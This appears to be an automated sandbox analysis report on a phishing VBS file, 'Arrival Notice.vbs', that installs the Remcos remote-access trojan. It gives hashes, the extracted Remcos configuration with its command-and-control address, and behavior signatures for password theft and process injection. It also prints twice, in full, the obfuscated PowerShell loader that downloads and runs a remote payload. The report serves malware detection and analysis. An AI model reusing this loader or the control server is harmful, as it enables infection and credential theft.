Analysis
-
max time kernel
147s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
16-12-2024 08:05
Static task
static1
Behavioral task
behavioral1
Sample
Arrival Notice.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Arrival Notice.vbs
Resource
win10v2004-20241007-en
General
-
Target
Arrival Notice.vbs
-
Size
10KB
-
MD5
edd6dd584636576b9ed73d01a8dc2d71
-
SHA1
fa62d8bdc40beecdf037ed9da244730c685716ee
-
SHA256
afbd22ee9bd00bc71554de232ad2864d09011d0c5b8092b192172db9a58abda2
-
SHA512
d92a481d431ff3e8e7bd280299f6cb69b01592c14248d9077f32b4b7080d31c1cf0e599e87cfcd5b2ae2817b728c991b86d51d28c8ce8846eb04b2b503b216eb
-
SSDEEP
192:rz+4vQA3AcB5wF3VtGBpHvFoY0+PcazUpa4N1FPE0Jcct9n72f:v+4vX3AcBKtCPHvOYBP7QMwjECtlQ
Malware Config
Extracted
remcos
RemoteHost
154.216.17.190:2404
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-3W6OXK
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral1/memory/1020-52-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/3028-46-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/1080-45-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/3028-46-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/1080-45-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 6 IoCs
flow pid Process 5 2244 powershell.exe 7 2576 msiexec.exe 9 2576 msiexec.exe 10 2576 msiexec.exe 12 2576 msiexec.exe 13 2576 msiexec.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: WScript.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2576 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2864 powershell.exe 2576 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2576 set thread context of 1080 2576 msiexec.exe 38 PID 2576 set thread context of 3028 2576 msiexec.exe 39 PID 2576 set thread context of 1020 2576 msiexec.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2244 powershell.exe 2864 powershell.exe 2864 powershell.exe 1080 msiexec.exe 1080 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 2864 powershell.exe 2576 msiexec.exe 2576 msiexec.exe 2576 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2244 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeDebugPrivilege 1020 msiexec.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 1220 wrote to memory of 2244 1220 WScript.exe 31 PID 1220 wrote to memory of 2244 1220 WScript.exe 31 PID 1220 wrote to memory of 2244 1220 WScript.exe 31 PID 2864 wrote to memory of 2576 2864 powershell.exe 36 PID 2864 wrote to memory of 2576 2864 powershell.exe 36 PID 2864 wrote to memory of 2576 2864 powershell.exe 36 PID 2864 wrote to memory of 2576 2864 powershell.exe 36 PID 2864 wrote to memory of 2576 2864 powershell.exe 36 PID 2864 wrote to memory of 2576 2864 powershell.exe 36 PID 2864 wrote to memory of 2576 2864 powershell.exe 36 PID 2864 wrote to memory of 2576 2864 powershell.exe 36 PID 2576 wrote to memory of 1080 2576 msiexec.exe 38 PID 2576 wrote to memory of 1080 2576 msiexec.exe 38 PID 2576 wrote to memory of 1080 2576 msiexec.exe 38 PID 2576 wrote to memory of 1080 2576 msiexec.exe 38 PID 2576 wrote to memory of 1080 2576 msiexec.exe 38 PID 2576 wrote to memory of 1080 2576 msiexec.exe 38 PID 2576 wrote to memory of 1080 2576 msiexec.exe 38 PID 2576 wrote to memory of 1080 2576 msiexec.exe 38 PID 2576 wrote to memory of 3028 2576 msiexec.exe 39 PID 2576 wrote to memory of 3028 2576 msiexec.exe 39 PID 2576 wrote to memory of 3028 2576 msiexec.exe 39 PID 2576 wrote to memory of 3028 2576 msiexec.exe 39 PID 2576 wrote to memory of 3028 2576 msiexec.exe 39 PID 2576 wrote to memory of 3028 2576 msiexec.exe 39 PID 2576 wrote to memory of 3028 2576 msiexec.exe 39 PID 2576 wrote to memory of 3028 2576 msiexec.exe 39 PID 2576 wrote to memory of 1020 2576 msiexec.exe 40 PID 2576 wrote to memory of 1020 2576 msiexec.exe 40 PID 2576 wrote to memory of 1020 2576 msiexec.exe 40 PID 2576 wrote to memory of 1020 2576 msiexec.exe 40 PID 2576 wrote to memory of 1020 2576 msiexec.exe 40 PID 2576 wrote to memory of 1020 2576 msiexec.exe 40 PID 2576 wrote to memory of 1020 2576 msiexec.exe 40 PID 2576 wrote to memory of 1020 2576 msiexec.exe 40
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Arrival Notice.vbs"1⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$socialpensionerne='Aeonisms';;$undercapitalisations='Finsk';;$Plumpeste='Defeater191';;$Lysegrnnes='Tetractine';;$Teledendrite=$host.Name; function Aswan($Laconicness){If ($Teledendrite) {$Francisca='sindal181';$sigatoka=3;$Tingbogsattests=$sigatoka}do{$Fertiles+=$Laconicness[$Tingbogsattests];$Tingbogsattests+=4} until(!$Laconicness[$Tingbogsattests])$Fertiles}function mumpishness($Afpatruljeret){ .($Massage) ($Afpatruljeret)}$Dyrlgebil=Aswan ' U,n spe grTHus.MobW';$Dyrlgebil+=Aswan 'BluEsikbH aCfamLDanITraeNonNP eT';$Genetablerende=Aswan 'CarMst.oE szP.riPoll,arlCataRed/';$Uncrystallisable=Aswan ' I Tpr.lAc.sMat1,oc2';$tillringerne='Int[UdsNMileProt fs.TaksDu,e IkRJoyvlftisigcRefeHaaPR boMauiMagnDettNo m BrALe N PiaBolg ee syruvi]Bal:si,:NyasHijeEkscspruca rskiiTalTIm YFalPOverTonoDertLysODe CgriopenLs l=f l$B suun.Nscac ir BayTo sUniTWheaMyeLFinlPreiI.tsRioase.BFill Fie';$Genetablerende+=Aswan ' il5Un . Fo0 Ya C (MahWTr i asnEludPo oMalwP os Bi CipNAfrT on i1 vi0Con.scr0Ove; sn ca.WNotiBe,nGia6her4see; e DamxFtp6Dis4spe;Raa FlerV.jv np:Mi.1Pop3 Di1 in.Ant0The)M.t suGAcueAn cDouk Teosin/G,n2Ele0M,m1Nov0sna0Tal1Bra0Gyl1res nsF t iExorFineUdbfAcroAn.xtul/Mor1Ecc3Dra1 Vi.sci0';$Eire=Aswan 'U.nUpersNskeRetREle-scrANedgKi EOmsn upt';$Udadvendendes=Aswan ' CehBovtC at CrpE bsAfm: i/Pr /B umgruhrotl nc as. Ams O h asoshap Ci/ ntv ydlU dEYarOEmixsidoHypqbypCHal/besAH baGlabsaneH.mn ,ah CheBoldDigeDicnU.tssto. nip,lar atm';$Taramasalata=Aswan 'Ord>';$Massage=Aswan 'sl.iMatEVirx';$Cumulating='Overvejelsens';$systemprdikats='\Hovedperson.Chu';mumpishness (Aswan 'Vio$.ing UnlOprObonBCapA.prlflu: biUFaiR usL tPLgtRInfOstaGCi 1Ama2ska0swe=Mar$stoeUncN .avPar:Re aBeaPOmfPBl D k,aAm.tGufAPro+Pyx$ ulsRe yny,sC.bTsgeEspomVagp ydRs.hdUn i afKLigAWa tst,s');mumpishness (Aswan 'Brn$EcogNonL,esO TybAn,aspal Ou:EleFKvsrcubysphs PaERumPFr UBilNAfnk Bat lvsAllsD,nNFloK renTopIUntN reGTriEFedrA s= Fa$InfuHagdLysAstrdBryv reJu NUdfdBilEBa nCardCone igsFre.Anfs,kops.rl.isIfraTsed( or$ ArT ipaRefrpelAsamMParaRhasPreAK.lL syaBlotK,mAD s)');mumpishness (Aswan $tillringerne);$Udadvendendes=$Frysepunktssnkninger[0];$Linienummers=(Aswan ' p$ CegFuklUntO P b.piANetl,yk:T.mM G.UAssDmedw laOReersepT sk=IdonAu,eBorWUn,- oxo,utb B,JIlleMutc UnTBra Behs .jYBa.sUndt M ePlemDat.Ant$ F d FoyGerRnepl InGPeneKn,BVa.i igl');mumpishness ($Linienummers);mumpishness (Aswan ' ta$RetMFluu .mdlanwNa.o.orr Kotsou.HvlHRnneEr,a ,kdgameKalrBegs et[Acc$ ,aE,eoiH ar .eeMid] ac= ag$ HaGU.seU.inPa.eKo t GaaAntb HvlFreeKetre teHjdntjedFr,e');$Nrgaaendes=Aswan ' av$ tiMstrustrd.oswNelosmarTa.tPyg.PlaDA koforwHutn ollr io NoaLigd A F Uli LelBroeElu(Gu $TriURepd rua OpdG.avToxee rnRetdEk eT.nnDagdKapeM.ysPer,Luf$ inuFisd .yfob aLysl KldLepsse vG,aisexn E kIbee Ril Dis No)';$udfaldsvinkels=$Ursprog120;mumpishness (Aswan 'sup$semGs bl alOKunBluba hilPut:ArddFl.eF tkBakLpaaAIrrrBeveLedr eiDasndregsmie inREftN Coe Te=smy(sliTOveeVelsGrnTDaa- ilp RoaRemT elhTag Ad$LanUCroD AgF saaBeslBomdGapsTraVB.eIRa,NNonkMoneBroL ResDim)');while (!$Deklareringerne) {mumpishness (Aswan 'Hal$RptgCoslsmeo .obspiaExplLan: NiIMaknIndtDoneForrskoeBrusPets ,oeFonnGayt ,is UnkGama BebAl eribt ro=saa$DanCKleaFo,r ictKnue hlLusi LuzPapiConn,igg') ;mumpishness $Nrgaaendes;mumpishness (Aswan 'MegsTeytKonaLanRUdsTsel-AorsBe lAf,EUniE P.Pski a4');mumpishness (Aswan ' .n$steg,nclProohelbsliA hLFe :P oD PreEndKResls rAForr oeCoarBepIsurnKomgLaceTorrTrknskaeTos=T l(systCh Esv sReatCi -TetpResAForT rhRe shu$RepU ,ldEleFLivA amL,redPapsIngVMo.ib lN,onk,quEMisL .ps ,o)') ;mumpishness (Aswan ' i$prog.enL WioA.fBMira rdLU s:Tilo BoPPinhAf iCelocomsUnsTForaPreps,mhTorYDiaLAmieLyn=Te,$s,rg ReLVaao A bTabastrl us:WeeUKulNUdldGeiE turEffAsalgC.nE ChNExhcDroYPa + Gl+be %.an$somfDe ROutyFols TieforPFlgUM tn sakZonTT xsmols OuNBegkA kN s iBnhnO eG C,e UnrHer. AbcspaoDi,uAlnn rdt') ;$Udadvendendes=$Frysepunktssnkninger[$Ophiostaphyle]}$Tingbogsattestsmmunosuppressants=302555;$federalistens=28591;mumpishness (Aswan 'Heb$HjrG sulTwiO spB T.aRevLHer:KonsspaV EneRoosUndk Pae losVeg Fos=Gal PangskgEdetT,es- ntC Maosk NB tt TaeCarNMilT,aa For$jeduLaudPoefPseasrbL.nvD Res FlvMetispnNFejK FaeKo LDors');mumpishness (Aswan 'Uns$skrg omlMotoFoob,alaGaslDyb:NonsDivoBa m X n Ime,slrW b Cap=Unm Dra[UnisVa ystisT,st JeeA.hm c.Oc C ,noAnsnA nvcareAerrUdkt Bu]Bde: os:V uFDatrEasoPromEtaBD baAngsPune No6Afs4skesHabtCharLaniskens pg sb(De,$K,fsma v imeBibsFosks.peGuasAlp)');mumpishness (Aswan 'Voc$ acgBatlInkOBjrBGria CrL Ra:Perfs rOBlerBasgUdsINegFAantFi ePlaTTyp2Ove1Oms1Jul And=Ani Bo[ e.s ViYs,ls imT D E arM w .CurtLavEKonxhamt Ti.AfgE BinPalCBibO P DPolIRegnPi gHa ] yr: sk:Du AUndsRygc HoICooi Pe.BregFreeperTsatsPhyTPa.rskrI lenUn GCra(Bil$ Rasun.o reMHjeNFr eMa R J )');mumpishness (Aswan 'U m$sumgAntLTopoOlyB DiaT el nv:RenV s rArbD,kkIB ogRadHsd.e ysDswieDa rTossI k=Als$A eFsrgoRecR,aoG abiF efA.yt.ndEChiTp,l2 ru1Jor1 Ol.GalsTy UN mbTrosvi.th fR Ani rNDecGEks(sta$ spt MeI FoN ElGCloBudtoEnvg ResPixA TaTP ot spE HjsTerTKabsPenman,mToru eonMenOUncsRadUPaap ldP eaRgule BisC ms Dia agn PaTsnysInd,Unb$JagFTroe suDTr eAllRTraAgudl soIWi.sj.oT PeeNatNstasDos)');mumpishness $Vrdigheders;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$socialpensionerne='Aeonisms';;$undercapitalisations='Finsk';;$Plumpeste='Defeater191';;$Lysegrnnes='Tetractine';;$Teledendrite=$host.Name; function Aswan($Laconicness){If ($Teledendrite) {$Francisca='sindal181';$sigatoka=3;$Tingbogsattests=$sigatoka}do{$Fertiles+=$Laconicness[$Tingbogsattests];$Tingbogsattests+=4} until(!$Laconicness[$Tingbogsattests])$Fertiles}function mumpishness($Afpatruljeret){ .($Massage) ($Afpatruljeret)}$Dyrlgebil=Aswan ' U,n spe grTHus.MobW';$Dyrlgebil+=Aswan 'BluEsikbH aCfamLDanITraeNonNP eT';$Genetablerende=Aswan 'CarMst.oE szP.riPoll,arlCataRed/';$Uncrystallisable=Aswan ' I Tpr.lAc.sMat1,oc2';$tillringerne='Int[UdsNMileProt fs.TaksDu,e IkRJoyvlftisigcRefeHaaPR boMauiMagnDettNo m BrALe N PiaBolg ee syruvi]Bal:si,:NyasHijeEkscspruca rskiiTalTIm YFalPOverTonoDertLysODe CgriopenLs l=f l$B suun.Nscac ir BayTo sUniTWheaMyeLFinlPreiI.tsRioase.BFill Fie';$Genetablerende+=Aswan ' il5Un . Fo0 Ya C (MahWTr i asnEludPo oMalwP os Bi CipNAfrT on i1 vi0Con.scr0Ove; sn ca.WNotiBe,nGia6her4see; e DamxFtp6Dis4spe;Raa FlerV.jv np:Mi.1Pop3 Di1 in.Ant0The)M.t suGAcueAn cDouk Teosin/G,n2Ele0M,m1Nov0sna0Tal1Bra0Gyl1res nsF t iExorFineUdbfAcroAn.xtul/Mor1Ecc3Dra1 Vi.sci0';$Eire=Aswan 'U.nUpersNskeRetREle-scrANedgKi EOmsn upt';$Udadvendendes=Aswan ' CehBovtC at CrpE bsAfm: i/Pr /B umgruhrotl nc as. Ams O h asoshap Ci/ ntv ydlU dEYarOEmixsidoHypqbypCHal/besAH baGlabsaneH.mn ,ah CheBoldDigeDicnU.tssto. nip,lar atm';$Taramasalata=Aswan 'Ord>';$Massage=Aswan 'sl.iMatEVirx';$Cumulating='Overvejelsens';$systemprdikats='\Hovedperson.Chu';mumpishness (Aswan 'Vio$.ing UnlOprObonBCapA.prlflu: biUFaiR usL tPLgtRInfOstaGCi 1Ama2ska0swe=Mar$stoeUncN .avPar:Re aBeaPOmfPBl D k,aAm.tGufAPro+Pyx$ ulsRe yny,sC.bTsgeEspomVagp ydRs.hdUn i afKLigAWa tst,s');mumpishness (Aswan 'Brn$EcogNonL,esO TybAn,aspal Ou:EleFKvsrcubysphs PaERumPFr UBilNAfnk Bat lvsAllsD,nNFloK renTopIUntN reGTriEFedrA s= Fa$InfuHagdLysAstrdBryv reJu NUdfdBilEBa nCardCone igsFre.Anfs,kops.rl.isIfraTsed( or$ ArT ipaRefrpelAsamMParaRhasPreAK.lL syaBlotK,mAD s)');mumpishness (Aswan $tillringerne);$Udadvendendes=$Frysepunktssnkninger[0];$Linienummers=(Aswan ' p$ CegFuklUntO P b.piANetl,yk:T.mM G.UAssDmedw laOReersepT sk=IdonAu,eBorWUn,- oxo,utb B,JIlleMutc UnTBra Behs .jYBa.sUndt M ePlemDat.Ant$ F d FoyGerRnepl InGPeneKn,BVa.i igl');mumpishness ($Linienummers);mumpishness (Aswan ' ta$RetMFluu .mdlanwNa.o.orr Kotsou.HvlHRnneEr,a ,kdgameKalrBegs et[Acc$ ,aE,eoiH ar .eeMid] ac= ag$ HaGU.seU.inPa.eKo t GaaAntb HvlFreeKetre teHjdntjedFr,e');$Nrgaaendes=Aswan ' av$ tiMstrustrd.oswNelosmarTa.tPyg.PlaDA koforwHutn ollr io NoaLigd A F Uli LelBroeElu(Gu $TriURepd rua OpdG.avToxee rnRetdEk eT.nnDagdKapeM.ysPer,Luf$ inuFisd .yfob aLysl KldLepsse vG,aisexn E kIbee Ril Dis No)';$udfaldsvinkels=$Ursprog120;mumpishness (Aswan 'sup$semGs bl alOKunBluba hilPut:ArddFl.eF tkBakLpaaAIrrrBeveLedr eiDasndregsmie inREftN Coe Te=smy(sliTOveeVelsGrnTDaa- ilp RoaRemT elhTag Ad$LanUCroD AgF saaBeslBomdGapsTraVB.eIRa,NNonkMoneBroL ResDim)');while (!$Deklareringerne) {mumpishness (Aswan 'Hal$RptgCoslsmeo .obspiaExplLan: NiIMaknIndtDoneForrskoeBrusPets ,oeFonnGayt ,is UnkGama BebAl eribt ro=saa$DanCKleaFo,r ictKnue hlLusi LuzPapiConn,igg') ;mumpishness $Nrgaaendes;mumpishness (Aswan 'MegsTeytKonaLanRUdsTsel-AorsBe lAf,EUniE P.Pski a4');mumpishness (Aswan ' .n$steg,nclProohelbsliA hLFe :P oD PreEndKResls rAForr oeCoarBepIsurnKomgLaceTorrTrknskaeTos=T l(systCh Esv sReatCi -TetpResAForT rhRe shu$RepU ,ldEleFLivA amL,redPapsIngVMo.ib lN,onk,quEMisL .ps ,o)') ;mumpishness (Aswan ' i$prog.enL WioA.fBMira rdLU s:Tilo BoPPinhAf iCelocomsUnsTForaPreps,mhTorYDiaLAmieLyn=Te,$s,rg ReLVaao A bTabastrl us:WeeUKulNUdldGeiE turEffAsalgC.nE ChNExhcDroYPa + Gl+be %.an$somfDe ROutyFols TieforPFlgUM tn sakZonTT xsmols OuNBegkA kN s iBnhnO eG C,e UnrHer. AbcspaoDi,uAlnn rdt') ;$Udadvendendes=$Frysepunktssnkninger[$Ophiostaphyle]}$Tingbogsattestsmmunosuppressants=302555;$federalistens=28591;mumpishness (Aswan 'Heb$HjrG sulTwiO spB T.aRevLHer:KonsspaV EneRoosUndk Pae losVeg Fos=Gal PangskgEdetT,es- ntC Maosk NB tt TaeCarNMilT,aa For$jeduLaudPoefPseasrbL.nvD Res FlvMetispnNFejK FaeKo LDors');mumpishness (Aswan 'Uns$skrg omlMotoFoob,alaGaslDyb:NonsDivoBa m X n Ime,slrW b Cap=Unm Dra[UnisVa ystisT,st JeeA.hm c.Oc C ,noAnsnA nvcareAerrUdkt Bu]Bde: os:V uFDatrEasoPromEtaBD baAngsPune No6Afs4skesHabtCharLaniskens pg sb(De,$K,fsma v imeBibsFosks.peGuasAlp)');mumpishness (Aswan 'Voc$ acgBatlInkOBjrBGria CrL Ra:Perfs rOBlerBasgUdsINegFAantFi ePlaTTyp2Ove1Oms1Jul And=Ani Bo[ e.s ViYs,ls imT D E arM w .CurtLavEKonxhamt Ti.AfgE BinPalCBibO P DPolIRegnPi gHa ] yr: sk:Du AUndsRygc HoICooi Pe.BregFreeperTsatsPhyTPa.rskrI lenUn GCra(Bil$ Rasun.o reMHjeNFr eMa R J )');mumpishness (Aswan 'U m$sumgAntLTopoOlyB DiaT el nv:RenV s rArbD,kkIB ogRadHsd.e ysDswieDa rTossI k=Als$A eFsrgoRecR,aoG abiF efA.yt.ndEChiTp,l2 ru1Jor1 Ol.GalsTy UN mbTrosvi.th fR Ani rNDecGEks(sta$ spt MeI FoN ElGCloBudtoEnvg ResPixA TaTP ot spE HjsTerTKabsPenman,mToru eonMenOUncsRadUPaap ldP eaRgule BisC ms Dia agn PaTsnysInd,Unb$JagFTroe suDTr eAllRTraAgudl soIWi.sj.oT PeeNatNstasDos)');mumpishness $Vrdigheders;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yubunmmoigxwrjtwdzdxnpvydpsyfflc"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1080
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\bwom"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3028
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lqtfgxi"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
431KB
MD57f5c92d80f424f58341196446b1445bf
SHA1ee1935a922f128b85997e22d837d766d9b68b5f1
SHA256c4091502129b00d4dba538ad22f80ff6085903ffb471b5b6e1995089f05226a1
SHA512539e4332bad8299912e2baf1b1d815142437dc793f60167ac92d674e1a3d9b74711c4a09db0c37c4922e8311fa1034a4f82048b505860b57f5fb387dfbc77b8c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9K7VT4B4FNNN2TRJI1VJ.temp
Filesize7KB
MD5496245360a9d3b8ac24bf5324489f6eb
SHA1d1ca2a51ea6a3acbb1446e8ceaccf803e2ce56bf
SHA256bfdd34157c62c232222d5e4739ba21aa00c403a470c5fb0fd19d9617fb624db2
SHA512a4c3ded7d68ea5f204cbfe519419f8775a9c9110988c7170021804e0c912960128afba0eb8821b99926ec4de7f50b958936ffab29b63267a7f55fdcc7c6bcc60